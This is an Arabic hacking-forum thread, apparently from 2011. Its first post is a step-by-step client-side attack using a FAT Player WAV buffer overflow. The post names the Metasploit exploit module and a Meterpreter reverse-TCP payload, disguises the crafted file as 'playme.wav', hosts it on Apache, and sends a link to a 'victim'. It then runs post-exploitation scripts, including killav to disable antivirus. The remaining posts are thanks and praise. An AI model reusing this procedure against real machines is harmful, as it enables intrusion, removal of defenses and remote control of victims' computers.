:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   Penteration Testing Training (http://www.vbspiders.com/vb/f278.html)
-   -   fatplayer hide side client attack (http://www.vbspiders.com/vb/t56683.html)

spid3rnet 07-15-2011 03:37 PM

fatplayer hide side client attack
 
هده طريقة لإختراق الحواسيب عن طريق ترغرة ال Buffer overviewالمتواجدة في ال
FAT player

لرؤية الشرح بالصورة و الصوت مباشرة هنا

http://blip.tv/jac0bn3t/metasploit-fatplayer-buffer-overview-5376533

للتحميل الشرح هنا

http://blip.tv/file/get/Jac0bn3t-met...verview350.mp4

كن سخيا و إ قرأ هدا الموضوع

ما قمت باستخدامه :

Metasploit

OS:backtrack 5 and Win SP3

Camtasia studio recorder and editor

Fat player

الشرح:

قمت بإعداد PAYLOAD

على صيغة .WAV

exploit:
windows/fileformat/fatplayer_wav
PAYLOAD :windows/meterpreter/reverse_tcp



كيف قمنا بصنع ال PAYLOAD

الشرح في الفيديو من الدقيقة 1:00 إلى 2:15

تم وضعناها أى ال PAYLOADفي /root/backdoor.wav

حملنا FATPLAYER 0.6bالمتغورة بال Buffer Overview

ووضعناها أيضا في ال /root/fatplayer_win32

بعد دالك قمنا بتغير أسماء

FAYplayer_win32=====>fatplayer.exe
backdoor.wav=======>playme.wav

حولناهم من / rootإلى /var/www

سوف تتسألون لمادا الى /var/www

لكي تصبح قابلة للتحميل من اي حاسوب

بعد فتح ال بورت 80 عن تطريق ال

service apache2 start

ارسلت للضحية رسالة فيها رابط
168.192.*.*/fatplayer.exe
و
168.192.*.*/playme.wav

بعد قراءة الضحية للرسالة و تحميل fatplayer.exe and playme.wav

و تشعيل الموسيقا سوف احصل على meterpreter

و سأبدأ ببعض Meterpreter scripting

run checkvm للمعرفة هل هو System وهمي

run killavللقتل عمل ال antivirus

تم shell-i للحصول على CMD or bash

الموسيقا :savage garder

animal song

santa monica

Hαcĸer'ѕ Kιɴɢ 07-15-2011 03:52 PM

بارك الله فيك
واصل ابداعاتك
تحياتي لك :great:

R9TySix 07-15-2011 04:13 PM

Awesome :great:

bleu moon 07-15-2011 04:56 PM

3 مواضيــــــــــــــــــــــــــــع قويه يا غالي والله ...
تستاهل الف تقييم ...

bleu moon 07-15-2011 04:57 PM

اهه ... فهمت والله
تسلم

playme.wav

spid3rnet 07-15-2011 05:46 PM

شكرا على المرور سيكون المزيد بإدن الله

Black light 07-18-2011 08:47 PM

يعطيك العافيه ياغالي
واصل
لاكن التغرة ليست هاكذا
بل
ثغره
وشكرا لك

spid3rnet 07-19-2011 01:09 PM

أسف ولكن ليس لدي لوحة مفاتيح عربية فقط لاتينية

NICEHACKER 07-23-2011 08:06 AM

ممتاز اخى الكريم

sniper web 10-01-2011 12:51 AM

رد: fatplayer hide side client attack
 
مشكور يعطيك العافيه


الساعة الآن 12:28 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0